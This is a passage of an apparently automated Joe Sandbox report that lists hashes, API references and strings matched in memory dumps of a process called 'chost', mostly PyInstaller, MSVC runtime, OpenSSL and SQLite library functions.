                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CurrentProcess
                                                                                                                                                                                                                                        • String ID: ERROR$Error$Error [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                                                                                                        • API String ID: 2050909247-1591803126
                                                                                                                                                                                                                                        • Opcode ID: 16defea7d45dc340f891dcb1518e5bd63c50e449678e4b46de0281de23a8290b
                                                                                                                                                                                                                                        • Instruction ID: acb090b7fed5302f8a1616eebe57da262de0da86608b3f2e97c5dc219c5d32fa
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 16defea7d45dc340f891dcb1518e5bd63c50e449678e4b46de0281de23a8290b
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 86217172A1978292E630DB62B8817EAB394EB88384F408179FA8CC3759DF7CD549C740
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                        • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                        • Opcode ID: 644f40749f2397ccfee8900b191f86882f652c7814ccefc594fcc00cef1e1075
                                                                                                                                                                                                                                        • Instruction ID: 0d05e3bfdaf80de667f5b7547d690a6faa0e73dcae0319fba1f68cf6e2594ce4
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 644f40749f2397ccfee8900b191f86882f652c7814ccefc594fcc00cef1e1075
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 05F0AF31A09A07C1FA248B32A4C53799320EF85761F5482BDD66EC62E4DF2CD044C300
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _set_statfp
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1156100317-0
                                                                                                                                                                                                                                        • Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                                        • Instruction ID: cf1cf84fd7519ef8d569f3edcb94ba82d80560a5becd3dfce82a468c10d313cf
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FC11BF62E0CA1301FA769176D8D6375A044EF98360E24C6BCEB6FC73D6AE2CA941C100
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • FlsGetValue.KERNEL32(?,?,?,00007FF69437A613,?,?,00000000,00007FF69437A8AE,?,?,?,?,?,00007FF69437A83A), ref: 00007FF69437B41F
                                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF69437A613,?,?,00000000,00007FF69437A8AE,?,?,?,?,?,00007FF69437A83A), ref: 00007FF69437B43E
                                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF69437A613,?,?,00000000,00007FF69437A8AE,?,?,?,?,?,00007FF69437A83A), ref: 00007FF69437B466
                                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF69437A613,?,?,00000000,00007FF69437A8AE,?,?,?,?,?,00007FF69437A83A), ref: 00007FF69437B477
                                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF69437A613,?,?,00000000,00007FF69437A8AE,?,?,?,?,?,00007FF69437A83A), ref: 00007FF69437B488
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Value
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3702945584-0
                                                                                                                                                                                                                                        • Opcode ID: 43a5c13e669b9c0dc60c9d5204f3187f9cebb30c335aac4df6ce1d0b58ad24f5
                                                                                                                                                                                                                                        • Instruction ID: c3816e7ccb4b4bd9dcc8aac9f5bf226c5acc07ae850c02c62bca5ca817c8b057
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 43a5c13e669b9c0dc60c9d5204f3187f9cebb30c335aac4df6ce1d0b58ad24f5
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EE113D31A0C642C1FA78A7779AD21796161DF447B4F64C3BCEABDD67D6DE2CA441C200
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Value
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3702945584-0
                                                                                                                                                                                                                                        • Opcode ID: 8aa69c65082f5ed190463b1c2d732539134b8ecb86da000f77e4666776fecf75
                                                                                                                                                                                                                                        • Instruction ID: 19b0fa22ed921aca760f9be08ab730e1ca0926be049320a6483ac4a7e6d976ec
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8aa69c65082f5ed190463b1c2d732539134b8ecb86da000f77e4666776fecf75
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E3110630A0D207C5FA78627348D227E1191DF45324F58C7BCDABEDA2C2DD2DB481C241
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                        • String ID: verbose
                                                                                                                                                                                                                                        • API String ID: 3215553584-579935070
                                                                                                                                                                                                                                        • Opcode ID: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                                                                                                                                                                        • Instruction ID: 42273c6188cbe88440b9ca7e3ba895a8a964c810ab7160691afe433292c5d24c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9E918B32A0CA46C5E7B59E36D4A437D36A1EB44BA4F44C17ADADAC62D6DF3CE805C301
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • 00007FFE0E142010.VCRUNTIME140(?,?,?,?,00000080,?,?,?,00000000,00007FFDF70E8BBF), ref: 00007FFDF70E8889
                                                                                                                                                                                                                                        • 00007FFE0E142010.VCRUNTIME140(?,?,?,?,00000080,?,?,?,00000000,00007FFDF70E8BBF), ref: 00007FFDF70E890B
                                                                                                                                                                                                                                        • 00007FFE0E142010.VCRUNTIME140(?,?,?,?,00000080,?,?,?,00000000,00007FFDF70E8BBF), ref: 00007FFDF70E89FD
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2382752356.00007FFDF7051000.00000040.00000001.01000000.00000016.sdmp, Offset: 00007FFDF7050000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2382708573.00007FFDF7050000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2382752356.00007FFDF71B2000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2382752356.00007FFDF71B4000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2382752356.00007FFDF71C9000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2383046562.00007FFDF71CB000.00000080.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2383085811.00007FFDF71CC000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ffdf7050000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: 00007E142010
                                                                                                                                                                                                                                        • String ID: RETURNING may not use "TABLE.*" wildcards
                                                                                                                                                                                                                                        • API String ID: 2636501453-2313493979
                                                                                                                                                                                                                                        • Opcode ID: ccacce6d775528294b1bb77d916a8275d8b67c98ba807ef499f0322dea0ce11d
                                                                                                                                                                                                                                        • Instruction ID: 5500e2788fff8a8f80c868cc33dd1663cb2614367c08d34bcfb140c4f0dacc23
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ccacce6d775528294b1bb77d916a8275d8b67c98ba807ef499f0322dea0ce11d
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 12B1BC26B08A8185E720CB15D550AE967A1EB85BE4F09A335DEBD477D9DF38E0A1C300
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                        • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                                                                                        • API String ID: 3215553584-1196891531
                                                                                                                                                                                                                                        • Opcode ID: 4ea7f6e1ba59c177a711b7ec70ee344f27d005a52efb2894dd87f7f788f8515e
                                                                                                                                                                                                                                        • Instruction ID: c110ae03df0e133b930d4504e237ea070e2f33ccaea4a1adbe7c69e3ef5f2956
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4ea7f6e1ba59c177a711b7ec70ee344f27d005a52efb2894dd87f7f788f8515e
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 46816B72E0C243C6FA744E3B81902792AA0FB11B48F65C0BDDA89D76DADF2DA901D741
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2378252189.00007FFDEAE41000.00000040.00000001.01000000.00000022.sdmp, Offset: 00007FFDEAE40000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378210021.00007FFDEAE40000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378252189.00007FFDEAEA2000.00000040.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378252189.00007FFDEAEEE000.00000040.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378252189.00007FFDEAEF2000.00000040.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378252189.00007FFDEAEF7000.00000040.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378252189.00007FFDEAF4F000.00000040.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378252189.00007FFDEAF54000.00000040.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378252189.00007FFDEAF57000.00000040.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378628612.00007FFDEAF58000.00000080.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378672916.00007FFDEAF59000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ffdeae40000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: 00007B6570
                                                                                                                                                                                                                                        • String ID: CJK UNIFIED IDEOGRAPH-$HANGUL SYLLABLE
                                                                                                                                                                                                                                        • API String ID: 4069847057-87138338
                                                                                                                                                                                                                                        • Opcode ID: 8c364d9f7697f15a55bc755bfe662b8d9c35c3fd34f27cade82d87210dead623
                                                                                                                                                                                                                                        • Instruction ID: 5d199ab1c57ac5e4d6d5aedfd0b7c4d1c60945b5e69885636dc53fb45c236bc0
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8c364d9f7697f15a55bc755bfe662b8d9c35c3fd34f27cade82d87210dead623
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 38610932B1864346E66CAA15A43077E769AFB84F90F458275EADD47BC8EF3ED801C701
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2378751077.00007FFDF6A41000.00000040.00000001.01000000.0000001B.sdmp, Offset: 00007FFDF6A40000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378710820.00007FFDF6A40000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6AC3000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6AC5000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6AED000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6AF8000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6B03000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2379034636.00007FFDF6B07000.00000080.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2379155081.00007FFDF6B09000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ffdf6a40000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: 00007E140
                                                                                                                                                                                                                                        • String ID: ..\s\ssl\statem\extensions_srvr.c$D:\a\1\s\include\internal/packet.h$tls_parse_ctos_server_name
                                                                                                                                                                                                                                        • API String ID: 3866994075-4157686371
                                                                                                                                                                                                                                        • Opcode ID: df7c5cc1c5450ab236299e71f02084b029a770e3f54b11b68fceadd1af193070
                                                                                                                                                                                                                                        • Instruction ID: ae1b010212c6247c4ca41eb53528f3e1f053dc8c749552a025a6a33f6ee4d387
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: df7c5cc1c5450ab236299e71f02084b029a770e3f54b11b68fceadd1af193070
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 12611461F0CA9241FB20AB21D420FB9B399EF45B88F585231DA7D47EDEDE2CE5818700
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2378751077.00007FFDF6A41000.00000040.00000001.01000000.0000001B.sdmp, Offset: 00007FFDF6A40000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378710820.00007FFDF6A40000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6AC3000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6AC5000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6AED000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6AF8000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6B03000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2379034636.00007FFDF6B07000.00000080.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2379155081.00007FFDF6B09000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ffdf6a40000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: 00007
                                                                                                                                                                                                                                        • String ID: ..\s\ssl\ssl_sess.c$SSL_SESSION_new$ssl_get_new_session
                                                                                                                                                                                                                                        • API String ID: 3568877910-2527649602
                                                                                                                                                                                                                                        • Opcode ID: 81de3dcb5b9a74f6d10349495346cbec55276295be6eb05afdb2b4af8c059850
                                                                                                                                                                                                                                        • Instruction ID: 1eb2b8970f37df6813fdf783ea684342edd40d9c3ab0ca9d7943d198dcbdf390
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 81de3dcb5b9a74f6d10349495346cbec55276295be6eb05afdb2b4af8c059850
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 87719961B08AC282EB48AB35D960BBD7299FB84B84F544135DA3D4BBDEDF3DA5418700
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                                                                        • String ID: csm
                                                                                                                                                                                                                                        • API String ID: 2395640692-1018135373
                                                                                                                                                                                                                                        • Opcode ID: c7f5fdff7c0b40b6635b3f9850cf21a5be83d788788a684f503aa9329af71794
                                                                                                                                                                                                                                        • Instruction ID: f33db39e2dfaab69e9516923f1277f205e740758d65645103020de53731904ff
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c7f5fdff7c0b40b6635b3f9850cf21a5be83d788788a684f503aa9329af71794
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8851B232B296438AEB64CF26E489A387791FB44B98F14C178DA4E87748DF7CE841C700
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2382752356.00007FFDF7051000.00000040.00000001.01000000.00000016.sdmp, Offset: 00007FFDF7050000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2382708573.00007FFDF7050000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2382752356.00007FFDF71B2000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2382752356.00007FFDF71B4000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2382752356.00007FFDF71C9000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2383046562.00007FFDF71CB000.00000080.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2383085811.00007FFDF71CC000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ffdf7050000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: 00007E142010
                                                                                                                                                                                                                                        • String ID: out of memory$string or blob too big
                                                                                                                                                                                                                                        • API String ID: 2636501453-2410398255
                                                                                                                                                                                                                                        • Opcode ID: 2546402ceff79975b6071e291ca9160533ac407746b903c1a5e86b998dc6c08d
                                                                                                                                                                                                                                        • Instruction ID: eaa1a2742c6fe2d072a9e31cf7c320967f0a685242a4cfa1de914d262c3a5d09
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2546402ceff79975b6071e291ca9160533ac407746b903c1a5e86b998dc6c08d
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2361036AB0865282E7108B26E1606FE6770FF45B98F148032EF6D87BD9CF3CE411A700
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                                                        • String ID: MOC$RCC
                                                                                                                                                                                                                                        • API String ID: 3544855599-2084237596
                                                                                                                                                                                                                                        • Opcode ID: 1984f943fe60021c6db05f5888f7dd086acc6d0e2a461e0c712dd9be4fa02006
                                                                                                                                                                                                                                        • Instruction ID: a931f90d961dafcbe0b4b99237eddf6433d600b5eb2293fceafd16cb6f40851d
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1984f943fe60021c6db05f5888f7dd086acc6d0e2a461e0c712dd9be4fa02006
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 48617332908BC685D7709F26E4823AAB7A0FB857D4F048269EB9D47B55DF7CD194CB00
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
